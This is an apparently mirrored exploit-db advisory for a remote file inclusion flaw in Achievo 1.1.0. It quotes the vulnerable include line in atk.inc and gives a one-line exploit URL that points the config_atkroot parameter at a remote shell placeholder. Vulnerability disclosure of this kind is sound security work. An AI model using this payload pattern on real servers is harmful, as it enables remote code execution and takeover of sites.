exploit-db-mirror/platforms/php/webapps/3928.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

12 lines
357 B
Text
Executable file

## Achievo 1.1.0(index.php) Remote File Include Vulnerability ##
#Found by : Katatafish (karatatata@hush.com)
#Download http://www.achievo.org/files/achievo-stable-1.1.0.tar.gz
# File: ./atk.inc
include_once($config_atkroot."atk/modules/class.atkmodule.inc");
# Exploit http://site.com/[path]/index.php?config_atkroot=SHELL
# milw0rm.com [2007-05-15]